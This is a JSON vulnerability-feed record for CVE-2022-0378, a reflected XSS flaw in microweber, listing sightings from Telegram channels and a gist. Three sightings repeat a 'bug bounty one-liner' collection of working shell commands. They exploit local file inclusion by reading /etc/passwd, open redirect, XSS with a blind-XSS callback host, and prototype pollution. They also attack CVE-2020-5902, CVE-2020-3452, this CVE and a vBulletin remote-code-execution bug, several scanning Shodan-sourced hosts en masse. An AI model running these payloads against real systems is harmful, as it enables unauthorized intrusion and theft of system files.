{
  "vulnerability": "CVE-2022-0378",
  "sightings": [
    {
      "uuid": "5df5980b-2039-4e40-9785-80ec3e76b5f0",
      "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd",
      "author": "2a075640-a300-48a4-bb44-bc6130783b9b",
      "vulnerability": "CVE-2022-0378",
      "type": "published-proof-of-concept",
      "source": "https://t.me/Secur_information_technology/50",
      "content": "Awesome One-liner Bug Bounty :\n\n> A collection of awesome one-liner scripts especially for bug bounty.\n\nThis repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily\u2665 welcome.\n\n## Definitions\n\nThis section defines specific terms or placeholders that are used throughout one-line command/scripts.\n\n- 1.1. \"HOST\" defines one hostname, (sub)domain, or IP address, e.g. replaced by internal.host, domain.tld, sub.domain.tld, or 127.0.0.1.\n- 1.2. \"HOSTS.txt\" contains criteria 1.1 with more than one in file.\n- 2.1. \"URL\" definitely defines the URL, e.g. replaced by http://domain.tld/path/page.html or somewhat starting with HTTP/HTTPS protocol.\n- 2.2. \"URLS.txt\" contains criteria 2.1 with more than one in file.\n- 3.1. \"FILE.txt\" or \"FILE{N}.txt\" means the files needed to run the command/script according to its context and needs.\n- 4.1. \"OUT.txt\" or \"OUT{N}.txt\" means the file as the target storage result will be the command that is executed.\n\n---\n\n### Local File Inclusion\n\n\ngau HOST | gf lfi | qsreplace \"/etc/passwd\" | xargs -I% -P 25 sh -c 'curl -s \"%\" 2>&1 | grep -q \"root:x\" && echo \"VULN! %\"'\n### Open-redirect\n\n\nexport LHOST=\"URL\"; gau $1 | gf redirect | qsreplace \"$LHOST\" | xargs -I % -P 25 sh -c 'curl -Is \"%\" 2>&1 | grep -q \"Location: $LHOST\" && echo \"VULN! %\"'\n\n`bash\ncat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null\n\n### XSS\n> @cihanmehmet\n\nbash\ngospider -S URLS.txt -c 10 -d 5 --blacklist \".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)\" --other-source | grep -e \"code-200\" | awk '{print $5}'| grep \"=\" | qsreplace -a | dalfox pipe | tee OUT.txt\n\n\n\nbash\nwaybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt\n\n\n\nbash\ncat HOSTS.txt | getJS | httpx --match-regex \"addEventListener\\((?:'|\\\")message(?:'|\\\")\"\n\n### Prototype Pollution\n\n\nbash\nsubfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\\/?proto[testparam]=exploit\\//' FILE.txt | page-fetch -j 'window.testparam == \"exploit\"? \"[VULNERABLE]\" : \"[NOT VULNERABLE]\"' | sed \"s/(//g\" | sed \"s/)//g\" | sed \"s/JS //g\" | grep \"VULNERABLE\"\n\n### CVE-2020-5902\n\nbash\nshodan search http.favicon.hash:-335242539 \"3992\" --fields ip_str,port --separator \" \" | awk '{print $1\":\"$2}' | while read host do ;do curl --silent --path-as-is --insecure \"https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\" | grep -q root && \\printf \"$host \\033[0;31mVulnerable\\n\" || printf \"$host \\033[0;32mNot Vulnerable\\n\";done\n\n### CVE-2020-3452\n\n\nbash\nwhile read LINE; do curl -s -k \"https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\" | head | grep -q \"Cisco\" && echo -e \"[${GREEN}VULNERABLE${NC}] $LINE\" || echo -e \"[${RED}NOT VULNERABLE${NC}] $LINE\"; done < HOSTS.txt\n\n### CVE-2022-0378\n\n\nbash\ncat URLS.txt | while read h do; do curl -sk \"$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x\"|grep -qs \"onmouse\" && echo \"$h: VULNERABLE\"; done\n\n### vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution\n\n\nbash\nshodan search http.favicon.hash:-601665621 --fields ip_str,port --separator \" \" | awk '{print $1\":\"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \\printf \"$host \\033[0;31mVulnerable\\n\" || printf \"$host \\033[0;32mNot Vulnerable\\n\";done;`\n\n### Find JavaScript Files",
      "creation_timestamp": "2024-05-19T19:36:04.000000Z"
    },
    {
      "uuid": "bbeccac3-7bdd-4316-9adf-e28c1d41af99",
      "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd",
      "author": "2a075640-a300-48a4-bb44-bc6130783b9b",
      "vulnerability": "CVE-2022-0378",
      "type": "published-proof-of-concept",
      "source": "Telegram/nStt2837JwMi-pNwVNAVKFW1pW6ax87VAsIJlp6SBOAsR3PR",
      "content": "",
      "creation_timestamp": "2024-04-07T22:52:53.000000Z"
    },
    {
      "uuid": "fc5d795f-1e35-4d21-820a-4d148c1f926f",
      "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd",
      "author": "2a075640-a300-48a4-bb44-bc6130783b9b",
      "vulnerability": "CVE-2022-0378",
      "type": "published-proof-of-concept",
      "source": "Telegram/XEixgT2v6lVv-v10WCuCZF76lOmF7s1VJYhuh16MDU2-kpuT",
      "content": "",
      "creation_timestamp": "2024-07-16T11:41:25.000000Z"
    },
    {
      "uuid": "5913412e-4e84-45d1-b6c5-4ad91e56b487",
      "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd",
      "author": "2a075640-a300-48a4-bb44-bc6130783b9b",
      "vulnerability": "CVE-2022-0378",
      "type": "seen",
      "source": "https://t.me/cibsecurity/36316",
      "content": "\u203c CVE-2022-0378 \u203c\n\nCross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".",
      "creation_timestamp": "2022-01-26T18:19:44.000000Z"
    },
    {
      "uuid": "6dbf732b-766c-493f-a1ce-b1569434c8fc",
      "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd",
      "author": "2a075640-a300-48a4-bb44-bc6130783b9b",
      "vulnerability": "CVE-2022-0378",
      "type": "seen",
      "source": "https://gist.github.com/spynika/d36f61ba985c86eb9bce7b0d4251331c",
      "content": "",
      "creation_timestamp": "2025-02-24T06:35:53.000000Z"
    },
    {
      "uuid": "29cf55ce-624f-4408-bcc1-a139726267a0",
      "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd",
      "author": "2a075640-a300-48a4-bb44-bc6130783b9b",
      "vulnerability": "CVE-2022-0378",
      "type": "published-proof-of-concept",
      "source": "https://t.me/lostsec/328",
      "content": "Awesome One-liner Bug Bounty :\n\n> A collection of awesome one-liner scripts especially for bug bounty.\n\nThis repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily\u2665 welcome.\n\n## Definitions\n\nThis section defines specific terms or placeholders that are used throughout one-line command/scripts.\n\n- 1.1. \"HOST\" defines one hostname, (sub)domain, or IP address, e.g. replaced by internal.host, domain.tld, sub.domain.tld, or 127.0.0.1.\n- 1.2. \"HOSTS.txt\" contains criteria 1.1 with more than one in file.\n- 2.1. \"URL\" definitely defines the URL, e.g. replaced by http://domain.tld/path/page.html or somewhat starting with HTTP/HTTPS protocol.\n- 2.2. \"URLS.txt\" contains criteria 2.1 with more than one in file.\n- 3.1. \"FILE.txt\" or \"FILE{N}.txt\" means the files needed to run the command/script according to its context and needs.\n- 4.1. \"OUT.txt\" or \"OUT{N}.txt\" means the file as the target storage result will be the command that is executed.\n\n---\n\n### Local File Inclusion\n> @dwisiswant0\n\ngau HOST | gf lfi | qsreplace \"/etc/passwd\" | xargs -I% -P 25 sh -c 'curl -s \"%\" 2>&1 | grep -q \"root:x\" && echo \"VULN! %\"'\n### Open-redirect\n> @dwisiswant0\n\nexport LHOST=\"URL\"; gau $1 | gf redirect | qsreplace \"$LHOST\" | xargs -I % -P 25 sh -c 'curl -Is \"%\" 2>&1 | grep -q \"Location: $LHOST\" && echo \"VULN! %\"'\n> @N3T_hunt3r\ncat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null\n### XSS\n> @cihanmehmet\n\ngospider -S URLS.txt -c 10 -d 5 --blacklist \".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)\" --other-source | grep -e \"code-200\" | awk '{print $5}'| grep \"=\" | qsreplace -a | dalfox pipe | tee OUT.txt\n> @fanimalikhack\n\nwaybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt\n> @oliverrickfors\n\ncat HOSTS.txt | getJS | httpx --match-regex \"addEventListener\\((?:'|\\\")message(?:'|\\\")\"\n### Prototype Pollution\n> @R0X4R\n\nsubfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\\/?__proto__[testparam]=exploit\\//' FILE.txt | page-fetch -j 'window.testparam == \"exploit\"? \"[VULNERABLE]\" : \"[NOT VULNERABLE]\"' | sed \"s/(//g\" | sed \"s/)//g\" | sed \"s/JS //g\" | grep \"VULNERABLE\"\n### CVE-2020-5902\n> @Madrobot_\n\nshodan search http.favicon.hash:-335242539 \"3992\" --fields ip_str,port --separator \" \" | awk '{print $1\":\"$2}' | while read host do ;do curl --silent --path-as-is --insecure \"https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\" | grep -q root && \\printf \"$host \\033[0;31mVulnerable\\n\" || printf \"$host \\033[0;32mNot Vulnerable\\n\";done\n### CVE-2020-3452\n> @vict0ni\n\nwhile read LINE; do curl -s -k \"https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\" | head | grep -q \"Cisco\" && echo -e \"[${GREEN}VULNERABLE${NC}] $LINE\" || echo -e \"[${RED}NOT VULNERABLE${NC}] $LINE\"; done < HOSTS.txt\n### CVE-2022-0378\n> @7h3h4ckv157\n\ncat URLS.txt | while read h do; do curl -sk \"$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x\"|grep -qs \"onmouse\" && echo \"$h: VULNERABLE\"; done\n### vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution\n> @Madrobot_\n\nshodan search http.favicon.hash:-601665621 --fields ip_str,port --separator \" \" | awk '{print $1\":\"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \\printf \"$host \\033[0;31mVulnerable\\n\" || printf \"$host \\033[0;32mNot Vulnerable\\n\";done;\n### Find JavaScript Files\n> @D0cK3rG33k",
      "creation_timestamp": "2024-04-07T05:37:53.000000Z"
    },
    {
      "uuid": "ee44d5b7-4a3f-4534-8be7-d79abde3eec6",
      "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd",
      "author": "2a075640-a300-48a4-bb44-bc6130783b9b",
      "vulnerability": "CVE-2022-0378",
      "type": "published-proof-of-concept",
      "source": "https://t.me/ctftm/604",
      "content": "Awesome One-liner Bug Bounty :\n\n> A collection of awesome one-liner scripts especially for bug bounty.\n\nThis repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily\u2665 welcome.\n\n## Definitions\n\nThis section defines specific terms or placeholders that are used throughout one-line command/scripts.\n\n- 1.1. \"HOST\" defines one hostname, (sub)domain, or IP address, e.g. replaced by internal.host, domain.tld, sub.domain.tld, or 127.0.0.1.\n- 1.2. \"HOSTS.txt\" contains criteria 1.1 with more than one in file.\n- 2.1. \"URL\" definitely defines the URL, e.g. replaced by http://domain.tld/path/page.html or somewhat starting with HTTP/HTTPS protocol.\n- 2.2. \"URLS.txt\" contains criteria 2.1 with more than one in file.\n- 3.1. \"FILE.txt\" or \"FILE{N}.txt\" means the files needed to run the command/script according to its context and needs.\n- 4.1. \"OUT.txt\" or \"OUT{N}.txt\" means the file as the target storage result will be the command that is executed.\n\n---\n\n### Local File Inclusion\n\ngau HOST | gf lfi | qsreplace \"/etc/passwd\" | xargs -I% -P 25 sh -c 'curl -s \"%\" 2>&1 | grep -q \"root:x\" && echo \"VULN! %\"'\n### Open-redirect\n\nexport LHOST=\"URL\"; gau $1 | gf redirect | qsreplace \"$LHOST\" | xargs -I % -P 25 sh -c 'curl -Is \"%\" 2>&1 | grep -q \"Location: $LHOST\" && echo \"VULN! %\"'\n```bash\ncat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null\n\n### XSS\n\nbash\ngospider -S URLS.txt -c 10 -d 5 --blacklist \".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)\" --other-source | grep -e \"code-200\" | awk '{print $5}'| grep \"=\" | qsreplace -a | dalfox pipe | tee OUT.txt\n\n\nbash\nwaybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt\n\n\nbash\ncat HOSTS.txt | getJS | httpx --match-regex \"addEventListener\\((?:'|\\\")message(?:'|\\\")\"\n\n### Prototype Pollution\n\nbash\nsubfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\\/?proto[testparam]=exploit\\//' FILE.txt | page-fetch -j 'window.testparam == \"exploit\"? \"[VULNERABLE]\" : \"[NOT VULNERABLE]\"' | sed \"s/(//g\" | sed \"s/)//g\" | sed \"s/JS //g\" | grep \"VULNERABLE\"\n\n### CVE-2020-5902\n\nbash\nshodan search http.favicon.hash:-335242539 \"3992\" --fields ip_str,port --separator \" \" | awk '{print $1\":\"$2}' | while read host do ;do curl --silent --path-as-is --insecure \"https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\" | grep -q root && \\printf \"$host \\033[0;31mVulnerable\\n\" || printf \"$host \\033[0;32mNot Vulnerable\\n\";done\n\n### CVE-2020-3452\n\nbash\nwhile read LINE; do curl -s -k \"https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\" | head | grep -q \"Cisco\" && echo -e \"[${GREEN}VULNERABLE${NC}] $LINE\" || echo -e \"[${RED}NOT VULNERABLE${NC}] $LINE\"; done < HOSTS.txt\n\n### CVE-2022-0378\n> @7h3h4ckv157\n\nbash\ncat URLS.txt | while read h do; do curl -sk \"$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x\"|grep -qs \"onmouse\" && echo \"$h: VULNERABLE\"; done\n\n### vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution\n\nbash\nshodan search http.favicon.hash:-601665621 --fields ip_str,port --separator \" \" | awk '{print $1\":\"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \\printf \"$host \\033[0;31mVulnerable\\n\" || printf \"$host \\033[0;32mNot Vulnerable\\n\";done;`\n\n### Find JavaScript Files\n====================\nJoin Our Telegram Channel\nhttps://t.me/ctftm",
      "creation_timestamp": "2024-05-04T18:47:12.000000Z"
    }
  ]
}